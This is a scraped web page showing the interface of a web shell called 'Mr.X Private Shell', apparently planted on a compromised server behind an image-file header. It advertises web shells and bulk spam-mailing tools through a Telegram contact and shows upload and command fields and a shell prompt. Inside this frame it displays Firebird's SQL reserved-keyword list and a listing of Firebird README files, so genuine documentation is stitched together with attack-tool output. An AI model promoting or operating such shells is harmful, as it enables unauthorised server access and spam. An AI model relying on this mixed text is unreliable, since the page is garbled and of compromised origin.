����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

deexcl@216.73.217.71: ~ $
----------------------------------------------------
SQL keywords introduced in different server versions
----------------------------------------------------

Deviations from the standard:
 *  : keyword does not exist in the SQL:2016 specification and should be
      considered a non-standard language extention.
(1) : reserved word in SQL:2016, non-reserved in Firebird
(2) : non-reserved word in SQL:2016, reserved word in Firebird

Firebird 1.0
------------

  Added as reserved words:

    BREAK *
    CURRENT_ROLE
    CURRENT_USER
    DESCRIPTOR (2)
    FIRST (2)
    RECREATE *
    SKIP
    SUBSTRING

Firebird 1.5
------------

  Added as reserved words:

    BIGINT
    CASE
    CURRENT_CONNECTION *
    CURRENT_TRANSACTION *
    RELEASE
    ROW_COUNT
    SAVEPOINT

  Added as non-reserved words:

    COALESCE (1)
    DELETING *
    INSERTING *
    LAST
    LEAVE *
    LOCK *
    NULLIF (1)
    NULLS
    STATEMENT
    UPDATING *
    USING (1)

  Moved from reserved words to non-reserved:

    BREAK *
    DESCRIPTOR
    FIRST
    SKIP (1)
    SUBSTRING (1)

Firebird 2.0
------------

  Added as reserved words:

    BIT_LENGTH *
    BOTH
    CHAR_LENGTH
    CHARACTER_LENGTH
    CLOSE
    CROSS
    FETCH
    LEADING
    LOWER
    OCTET_LENGTH
    OPEN
    ROWS
    TRAILING
    TRIM

  Moved from non-reserved words to reserved:

    USING

  Added as non-reserved words:

    BACKUP *
    BLOCK *
    COLLATION
    COMMENT *
    DIFFERENCE *
    IIF *
    NEXT
    SCALAR_ARRAY *
    SEQUENCE
    RESTART
    RETURNING

  Moved from reserved words to non-reserved:

    ACTION
    CASCADE
    FREE_IT *
    RESTRICT
    ROLE
    TYPE
    WEEKDAY *
    YEARDAY *

  Removed reserved words:

    BASENAME *
    CACHE *
    CHECK_POINT_LEN *
    GROUP_COMMIT_WAIT *
    LOGFILE *
    LOG_BUF_SIZE *
    NUM_LOG_BUFS *
    RAW_PARTITIONS *

Firebird 2.1
------------

  Added as reserved words:

    CONNECT
    DISCONNECT
    GLOBAL
    INSENSITIVE
    RECURSIVE
    SENSITIVE
    START

  Added as non-reserved words:

    ABS (1)
    ACCENT *
    ACOS (1)
    ALWAYS
    ASCII_CHAR *
    ASCII_VAL *
    ASIN (1)
    ATAN (1)
    ATAN2 *
    BIN_AND *
    BIN_OR *
    BIN_SHL *
    BIN_SHR *
    BIN_XOR *
    CEIL (1)
    CEILING (1)
    COS (1)
    COSH (1)
    COT *
    DATEADD *
    DATEDIFF *
    DECODE *
    EXP (1)
    FLOOR (1)
    GEN_UUID *
    GENERATED
    HASH *
    LIST *
    LN (1)
    LOG (1)
    LOG10 (1)
    LPAD *
    MATCHED
    MATCHING *
    MAXVALUE
    MILLISECOND *
    MINVALUE
    MOD (1)
    OVERLAY (1)
    PAD
    PI *
    PLACING
    POWER (1)
    PRESERVE
    RAND *
    REPLACE *
    REVERSE *
    ROUND *
    RPAD *
    SIGN *
    SIN (1)
    SINH (1)
    SPACE
    SQRT (1)
    TAN (1)
    TANH (1)
    TEMPORARY
    TRUNC *
    WEEK *

Firebird 2.5
------------

  Added as reserved words:

    SIMILAR

  Added as non-reserved words:

    AUTONOMOUS *
    BIN_NOT *
    CALLER *
    CHAR_TO_UUID *
    COMMON *
    DATA
    FIRSTNAME *
    GRANTED
    LASTNAME *
    MIDDLENAME *
    MAPPING *
    OS_NAME *
    SOURCE
    TWO_PHASE *
    UUID_TO_CHAR *

Firebird 3.0
------------

  Added as reserved words:

    BOOLEAN
    CORR
    COVAR_POP
    COVAR_SAMP
    DETERMINISTIC
    FALSE
    OFFSET
    OVER
    RDB$RECORD_VERSION *
    REGR_AVGX
    REGR_AVGY
    REGR_COUNT
    REGR_INTERCEPT
    REGR_R2
    REGR_SLOPE
    REGR_SXX
    REGR_SXY
    REGR_SYY
    RETURN
    ROW
    SCROLL
    SQLSTATE
    STDDEV_POP
    STDDEV_SAMP
    TRUE
    UNKNOWN
    VAR_POP
    VAR_SAMP

  Moved from non-reserved words to reserved:

    DELETING *
    INSERTING *
    RDB$GET_CONTEXT *
    RDB$SET_CONTEXT *
    UPDATING *

  Added as non-reserved words:

    ABSOLUTE
    ACOSH *
    ASINH *
    ATANH *
    BODY *
    CONTINUE
    DDL *
    DECRYPT *
    DENSE_RANK (1)
    ENCRYPT *
    ENGINE *
    FIRST_VALUE (1)
    IDENTITY (1)
    INCREMENT
    LAST_VALUE (1)
    LAG (1)
    LEAD (1)
    LINGER *
    NAME
    NTH_VALUE (1)
    PACKAGE *
    PARTITION (1)
    PLUGIN *
    PRIOR
    RANK (1)
    RELATIVE
    ROW_NUMBER (1)
    SERVERWIDE *
    TAGS *
    TRUSTED *
    USAGE

Firebird 4.0
------------

  Added as reserved words:

    BINARY
    DECFLOAT
    LATERAL
    LOCAL
    LOCALTIME
    LOCALTIMESTAMP
    PUBLICATION *
    RDB$GET_TRANSACTION_CN *
    RDB$ERROR *
    RDB$ROLE_IN_USE *
    RDB$SYSTEM_PRIVILEGE *
    TIMEZONE_HOUR
    TIMEZONE_MINUTE
    UNBOUNDED (2)
    VARBINARY
    WINDOW
    WITHOUT

  Added as non-reserved words:

    BASE64_DECODE *
    BASE64_ENCODE *
    BIND *
    COMPARE_DECFLOAT *
    CONSISTENCY *
    COUNTER *
    CTR_BIG_ENDIAN *
    CTR_LENGTH *
    CTR_LITTLE_ENDIAN *
    CUME_DIST (1)
    DEFINER
    DISABLE *
    ENABLE *
    EXCESS *
    EXCLUDE
    EXTENDED *
    FIRST_DAY *
    FOLLOWING
    HEX_DECODE *
    HEX_ENCODE *
    IDLE *
    INVOKER
    IV *
    LAST_DAY *
    LEGACY *
    LPARAM *
    MAKE_DBKEY *
    MESSAGE *
    MODE *
    NATIVE *
    NORMALIZE_DECFLOAT *
    NTILE (1)
    NUMBER
    OTHERS
    OVERRIDING
    PERCENT_RANK (1)
    PRECEDING
    PRIVILEGE *
    QUANTIZE *
    RANGE (1)
    RESET *
    RSA_DECRYPT *
    RSA_ENCRYPT *
    RSA_PRIVATE *
    RSA_PUBLIC *
    RSA_SIGN_HASH *
    RSA_VERIFY_HASH *
    SALT_LENGTH *
    SECURITY
    SESSION
    SIGNATURE *
    SQL (1)
    SYSTEM (1)
    TIES
    TOTALORDER *
    TRAPS *
    ZONE

Filemanager

Name Type Size Permission Actions
README.PSQL_stack_trace.txt File 1.96 KB 0644
README.aggregate_filter.md File 941 B 0644
README.aggregate_tracking File 3.88 KB 0644
README.alternate_string_quoting.txt File 846 B 0644
README.autonomous_transactions.txt File 1.31 KB 0644
README.blob_append.md File 4.99 KB 0644
README.builtin_functions.txt File 29.49 KB 0644
README.case File 1.71 KB 0644
README.coalesce File 1.04 KB 0644
README.column_type_psql.txt File 871 B 0644
README.common_table_expressions File 4.78 KB 0644
README.context_variables File 4.66 KB 0644
README.context_variables2 File 8.47 KB 0644
README.cumulative_roles.txt File 2.27 KB 0644
README.current_time File 814 B 0644
README.cursor_variables.txt File 2.75 KB 0644
README.cursors File 2.43 KB 0644
README.data_type_results_of_aggregations.txt File 1.56 KB 0644
README.data_types File 8.31 KB 0644
README.db_triggers.txt File 1.8 KB 0644
README.ddl.txt File 22.52 KB 0644
README.ddl_access.txt File 1.53 KB 0644
README.ddl_triggers.txt File 11.67 KB 0644
README.default_parameters File 1.91 KB 0644
README.derived_tables.txt File 2.69 KB 0644
README.distinct File 813 B 0644
README.domains_psql.txt File 933 B 0644
README.exception_handling File 2.44 KB 0644
README.execute_block File 1.45 KB 0644
README.execute_statement File 4.24 KB 0644
README.execute_statement2 File 9.54 KB 0644
README.explicit_locks File 5.91 KB 0644
README.expression_indices File 1.3 KB 0644
README.external_connections_pool File 4.31 KB 0644
README.floating_point_types.md File 2.33 KB 0644
README.global_temporary_tables File 3.43 KB 0644
README.hex_literals.txt File 1.13 KB 0644
README.identity_columns.txt File 3.24 KB 0644
README.iif File 541 B 0644
README.isc_info_xxx File 3.61 KB 0644
README.joins.txt File 1.23 KB 0644
README.keywords File 5.26 KB 0644
README.leave_labels File 1.68 KB 0644
README.length File 486 B 0644
README.linger File 1.34 KB 0644
README.list File 1.04 KB 0644
README.management_statements_psql.md File 925 B 0644
README.mapping.html File 14.91 KB 0644
README.merge.txt File 1.77 KB 0644
README.null_value File 23 B 0644
README.nullif File 611 B 0644
README.offset_fetch.txt File 1.69 KB 0644
README.order_by_expressions_nulls File 1.67 KB 0644
README.packages.txt File 5.12 KB 0644
README.plan File 3.49 KB 0644
README.regr_functions.txt File 1.14 KB 0644
README.returning File 2.91 KB 0644
README.rows File 1.34 KB 0644
README.savepoints File 4.08 KB 0644
README.scrollable_cursors.txt File 3.06 KB 0644
README.select_expressions File 2.18 KB 0644
README.sequence_generators File 1.68 KB 0644
README.set_bind.md File 4.49 KB 0644
README.set_role File 768 B 0644
README.set_transaction.txt File 1.63 KB 0644
README.similar_to.txt File 9.53 KB 0644
README.sql_security.txt File 5.51 KB 0644
README.statistical_functions.txt File 1.6 KB 0644
README.subroutines.txt File 4.23 KB 0644
README.substring_similar.txt File 1.2 KB 0644
README.time_zone.md File 14.34 KB 0644
README.trim File 997 B 0644
README.universal_triggers File 2.77 KB 0644
README.update_or_insert File 1.38 KB 0644
README.user_management File 4.43 KB 0644
README.view_updates File 23 B 0644
README.window_functions.md File 14.92 KB 0644